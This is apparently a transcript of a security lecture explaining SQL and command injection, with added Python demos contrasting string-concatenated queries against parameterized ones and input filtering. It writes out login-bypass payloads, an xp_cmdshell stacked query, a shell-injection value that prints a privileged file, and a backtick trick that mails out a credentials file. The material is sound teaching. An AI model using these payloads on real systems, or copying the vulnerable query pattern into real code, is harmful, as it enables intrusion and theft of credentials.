Now that we have talked about cross-site scripting and its friends, let's move on to attacks on databases and on systems directly. With these, the focus is the web, but they can be run from systems without going through the web; it depends on how the programs in the system are set up. Essentially what an SQL injection does is mimic a legitimate SQL command, but in a way or place that is unexpected, and do something harmful. The example on the next slide shows this very well. You can see the web app code: SELECT Username FROM Users WHERE Username = and the user supplies that, AND Password = and the user supplies the password. The program uses this query to get a result, and here the database is simply authenticating the user. So if the username and password that are supplied match an entry in the Users table, the query returns that row, and that counts as true; if not, it returns nothing because there is no match, the result is empty, and as you can see from the if statement, the boolean authenticated becomes false.

Now there is an assumption here that I will give a legitimate name and password. Whenever you hear the word assumption, think: how could someone muck with this? So maybe they give an illegitimate name and password, and what would be interesting here? Well, how about we embed some SQL in there? That is what the next bullet says. We are going to set the password to ' OR ''=' (a single quote, a space, OR, a space, two single quotes, an equals sign and a single quote). Note that the two adjacent single quotes here are not an escaped quote; once the web app wraps the input in its own quotes, they form an empty string literal. So you can now see what the SQL query looks like, and I am doing that from both the login name and the password. Notice where it says username: what this says is match the entry where the username is empty, or where empty equals empty, which is trivially true, so it matches all of them. Same with the password: either the password is empty, or empty equals empty.
Well, that is always true as well, so what this will do is match everything. I am saying where empty equals empty and empty equals empty, so that matches, and now I am authenticated because those are true, and I am into the system. That is an example of an SQL injection: the single quote and the OR are legitimate SQL syntax, but they are not expected inside a username. If you have ever seen the comic strip XKCD, Little Bobby Tables is an excellent example of this, because the Little Bobby Tables attack is basically exactly this.

Now, with Microsoft SQL Server it gets even more interesting, because there is a built-in stored procedure, xp_cmdshell, that lets you run a command in the command interpreter, the shell. So in essence, not only can you do SQL injection, you can also do command injection. Here is an example. Here you are getting an item and a price from a product list; you get the category from the input, and the result is ordered by price. The user supplies the little string shown under "the user supplies this" as the input. The single quote closes the category string, the semicolon ends the SQL statement, and then EXEC master..xp_cmdshell is the command interpreter, so that will run whatever follows. dir simply says list the files in this directory, and the double dash afterwards begins a comment that runs to the end of the line. So the trailing ' ORDER BY Price is ignored, and that is what you get: the item category is empty, the shell executes the command dir, and the closing single quote and ORDER BY Price are ignored because they are inside the comment. So now I have a listing of all the files in that directory; obviously, I can do much more. Let's parse this in detail, because it is a little confusing; the next slide does this. The first SQL query is the one up to the semicolon. The second SQL statement is the EXEC master..xp_cmdshell; that is handed to a shell and executed.
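To make the authentication bypass concrete, here is an added example (not the lecture's or the slide's code) that builds the slide's query by string concatenation against a small in-memory SQLite database, feeds it the ' OR ''=' payload from the lecture and a second classic payload that closes the quote and comments out the password check, and then runs the same lookups through a parameterized query. The table layout, the users and the passwords are constructed sample data.

```python
"""SQL injection against a login check, as an added example.

Mirrors the slide's query
    SELECT Username FROM Users WHERE Username = '<user>' AND Password = '<pass>'
against an in-memory SQLite database. Table layout, the user "bishop" and
the passwords are constructed sample data for the demo, not from the lecture.
"""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('bishop', 'correct horse')")
    conn.execute("INSERT INTO Users VALUES ('alice', 'hunter2')")
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    # The slide's pattern: user input pasted straight into the SQL text.
    return ("SELECT Username FROM Users WHERE Username = '" + username
            + "' AND Password = '" + password + "'")


def login_vulnerable(conn, username, password):
    # True if the query matches any row, exactly as the slide's if statement.
    rows = conn.execute(build_vulnerable_query(username, password)).fetchall()
    return len(rows) > 0


def login_parameterized(conn, username, password):
    # The fix: the query text is fixed and the values travel separately,
    # so quotes in the input are data, never SQL syntax.
    rows = conn.execute(
        "SELECT Username FROM Users WHERE Username = ? AND Password = ?",
        (username, password),
    ).fetchall()
    return len(rows) > 0


# The lecture's payload: quote, OR, empty string, equals, quote.
BYPASS = "' OR ''='"

# A second classic: close the string and comment out the password check.
COMMENT_BYPASS = "bishop'--"


def demo():
    """Run every case once and return the outcomes by name."""
    conn = make_db()
    return {
        "legit": login_vulnerable(conn, "bishop", "correct horse"),
        "wrong_pw": login_vulnerable(conn, "bishop", "nope"),
        "bypass": login_vulnerable(conn, BYPASS, BYPASS),
        "comment_bypass": login_vulnerable(conn, COMMENT_BYPASS, "anything"),
        "param_bypass": login_parameterized(conn, BYPASS, BYPASS),
        "param_comment": login_parameterized(conn, COMMENT_BYPASS, "anything"),
        "param_legit": login_parameterized(conn, "bishop", "correct horse"),
    }


if __name__ == "__main__":
    print(build_vulnerable_query(BYPASS, BYPASS))
    for name, ok in demo().items():
        print(f"{name:15s} authenticated={ok}")
```

Printing the built query shows exactly what the lecture describes: WHERE Username = '' OR ''='' AND Password = '' OR ''='', which is true for every row. The parameterized version never sees a quote as syntax, so both payloads fail there while the real credentials still work.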
So what that does is execute the command in quotes, which is dir, meaning list the files in that directory. Then the trailing comment is the --' ORDER BY Price. So what this means, again, is: when you get input, don't trust it. If you don't know that it is good, dump it. You can filter if you must, but filtering is a problem. The best way to filter, instead of using a blacklist of characters you don't want, is to use a whitelist of characters you will allow. The problem is that the hyphen is often a legal character, but -- begins an SQL comment, so you have to watch out for that. Also check structure, not just the characters: is the input shaped like an SQL command? If so, it is dangerous. If you are requesting names and filtering, you also have the problem that some names have apostrophes, particularly Irish ones like O'Connor, O'Laughlin and so forth. So if you are going to allow those in, you have to put another apostrophe after each one, so that the doubled apostrophe is treated as a single, literal one by the SQL engine. In general, apostrophes are special to SQL: they can alter the meaning of a command and cause various nasty things to execute. With email addresses it gets even worse, because those can be very, very tricky. So that is SQL injection.

Command injection is essentially the same, except this time we are crafting the input so that the commands will run against the operating system. This is similar to the last injection we saw with SQL, except now we are not even going through SQL. Here is an example on the slide labeled Example, and we have a privileged program. It gets the username from standard input and stores it in address. If that is empty, you quit. If it is not empty, then you copy the address into the mail command shown there, so the letter is mailed to the person whose name was typed. That person, by the way, can be pretty much anyone.
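The filtering advice above is easy to get wrong in practice, so here is an added example (not the lecture's code) that puts the three points side by side: a blacklist that misses the lecture's payloads entirely, a whitelist of allowed characters that admits real names but still lets the hyphen through, a structure check that catches the -- comment and OR-shaped input the whitelist cannot, and apostrophe doubling so that O'Connor can be spliced into a quoted SQL literal without breaking it. The name list, the regular expressions and the table layout are assumptions for the demo.

```python
"""Input filtering for a name field, as an added example (not the lecture's code).

Blacklist versus whitelist, a structure check for SQL-shaped input, and
apostrophe doubling for names such as O'Connor. The regexes, the allowed
character set and the sample names are assumptions for this demo.
"""
import re
import sqlite3

# Blacklist: the characters a naive developer might think of first.
BLACKLIST = set(";|&`")

# Whitelist: letters, space, hyphen and apostrophe, which real names need.
WHITELIST_RE = re.compile(r"^[-A-Za-z' ]{1,64}$")

# Structure check: does the input look like SQL rather than like a name?
SQL_SHAPED_RE = re.compile(
    r"(--|/\*|\b(or|and|union|select|exec)\b\s*['=(]|'\s*(or|and)\b)",
    re.IGNORECASE,
)


def passes_blacklist(s):
    return not any(c in BLACKLIST for c in s)


def passes_whitelist(s):
    return WHITELIST_RE.match(s) is not None


def looks_like_sql(s):
    return SQL_SHAPED_RE.search(s) is not None


def validate_name(s):
    """Accept only input that passes the whitelist and is not SQL-shaped."""
    return passes_whitelist(s) and not looks_like_sql(s)


def sql_quote(s):
    # Doubling each apostrophe is how a literal quote is written inside an
    # SQL string literal: 'O''Connor' is the name O'Connor.
    return "'" + s.replace("'", "''") + "'"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?)",
                     [("O'Connor",), ("O'Laughlin",), ("bishop",)])
    return conn


def lookup_by_name(conn, name):
    """Spliced query, but only after validation and quoting."""
    if not validate_name(name):
        raise ValueError("rejected input: " + repr(name))
    sql = "SELECT Username FROM Users WHERE Username = " + sql_quote(name)
    return [row[0] for row in conn.execute(sql)]


def naive_lookup_breaks(conn, name):
    """Without doubling, the apostrophe in O'Connor ends the literal early
    and the statement is malformed; SQLite reports a syntax error."""
    try:
        conn.execute("SELECT Username FROM Users WHERE Username = '" + name + "'")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    conn = make_db()
    for s in ["O'Connor", "' OR ''='", "bishop'--", "Mary-Jane O'Brien"]:
        print(f"{s!r:22s} blacklist={passes_blacklist(s)} "
              f"whitelist={passes_whitelist(s)} sql_shaped={looks_like_sql(s)} "
              f"accepted={validate_name(s)}")
    print(lookup_by_name(conn, "O'Connor"), naive_lookup_breaks(conn, "O'Connor"))
```

The run shows the lecture's warning about the hyphen: bishop'-- passes the character whitelist because every character in it is legal in a name, and only the structure check rejects it. It also shows why a blacklist is the wrong tool: neither payload contains a blacklisted character.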
Then you give that command to the system to execute. So now, instead of entering bishop, for example, I enter the thing in backticks: `echo me@myhost; cat privfile`. Now when that command is executed, the letter is piped to mail me@myhost, but the shell also runs cat privfile, printing the privileged file, a file readable with whatever privileges the program has, so now I can get a copy of that file. The ; cat privfile is the exact command being injected.

Now, I mentioned before that blacklists are bad and whitelists are good, and that often seems to fly in the face of what most people do. Well, here is an example of why. This goes back a little bit; in fact, it goes back to the days of Unix Version 6 and Version 7. Unix in those days had a command to copy files over the phone line, called uucp, and a command to execute commands remotely, called uux. They would dial up the remote system and then send over the file or execute the command, or whatever. Now, in Version 6, you could execute something like what is shown under the first bullet. What it would simply do is send to machine A and execute cat /usr/xyzzy/plugh to print that file. Commands are whitelisted, so only those commands that are allowed can be executed remotely, and it is very tightly restricted. Usually this was used for remote mail, so that is why rmail is there. The uux interpreter was smart enough to know about certain metacharacters: it knew the semicolon ended a command, it knew the pipe sign meant another command was coming, and the up arrow in Version 6 Unix was the same as a vertical bar for a pipe. Now, when they went to Version 7, they updated the shell: backticks were added, and the ampersand was added for background execution, but they did not update the uux filter that checked for all of these.
So if you look at the sequence of commands there, the L.sys file was very heavily protected, because it contained the phone numbers and passwords of the systems that this system could call up and work with. So what you would do is issue the command you can see right there. The important point is the backticks in the first line. The uucp command would pass those through, simply because it thought, you know, backticks, that is not special. But when it got to the other end it was handed to the command interpreter, which was a plain old shell, where backticks mean something special, and you would be able to execute whatever was inside them with the privileges of uucp. In this case, what I wanted to do was have the shell send me a copy of the remote L.sys file, and that is exactly what is there. So now I get the connection file: I get the logins, I get the passwords, I get the phone numbers, I get everything.